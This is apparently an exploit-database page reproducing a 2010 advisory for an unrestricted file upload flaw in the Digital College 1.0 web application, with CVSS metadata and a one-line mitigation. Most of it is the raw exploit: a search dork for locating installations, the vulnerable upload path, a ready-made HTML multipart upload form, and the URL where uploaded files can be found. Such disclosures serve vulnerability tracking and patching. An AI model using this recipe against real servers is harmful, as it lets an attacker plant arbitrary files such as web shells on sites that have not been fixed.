header-logo
Suggest Exploit
vendor:
Digital College 1.0
by:
indoushka
7,5
CVSS
HIGH
Upload Vulnerability
434
CWE
Product Name: Digital College 1.0
Affected Version From: Digital College 1.0
Affected Version To: Digital College 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:magtrb_soft:digital_college_1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Digital College 1.0 upload Vulnerability

A vulnerability exists in Digital College 1.0 which allows an attacker to upload malicious files to the server. An attacker can create a simple file uploader with HTML language and upload it to the server. This can be done by going to http://127.0.0.1/upload/includes/js/files/ and using the simple example provided.

Mitigation:

Ensure that all user-supplied input is validated and sanitized before being used in any file uploads.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Digital College 1.0 upload Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                                                                                                                                    
| # Dork     : Powered by Digital College 1.0 - Magtrb Soft 2010                                                                                                                 
| # Tested on: windows SP2 Français V.(Pnx2 2.0)        
| # Bug      : Upload  
| # Download : http://www.magtrb.com/                                                                   
======================      Exploit By indoushka       =================================
# Exploit  :  

1 - Go To http://127.0.0.1/upload/includes/js/files/

2 - use the Simple example

you need to Creat a simple file uploader whith html lang and upload it to the sever
==================================================
<html>
<head><title>File Upload Tester</title></head>
<body>

<form  enctype="multipart/form-data" action="test.html" method="post">	
<tr>
  <td  valign="top" align="center">
	<table border=0 align="center" cellpadding=3>
	<tr><td><input type="file" name="userfile[0]"></td></tr>
	<tr><td><input type="file" name="userfile[1]"></td></tr>
	<tr><td><input type="file" name="userfile[2]"></td></tr>
	<tr><td colspan=2 align="center">
		<input type="hidden" name="sessionid" value="<?= $sid ?>">
		<input type="submit">
	</td></tr></table>
</td>
</tr>
<tr><td>
<p  align="center">Please visit <a href="">http://www.iqs3cur1ty.com</a> by indoushka. 
</p>


</table>


</form>

</body>
</html>
==============================================================

3 - http://127.0.0.1/upload/includes/js/files/upload.php (2 Upload)

    http://127.0.0.1/upload\includes\js\files\files\uploader.html    (2 Find It)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR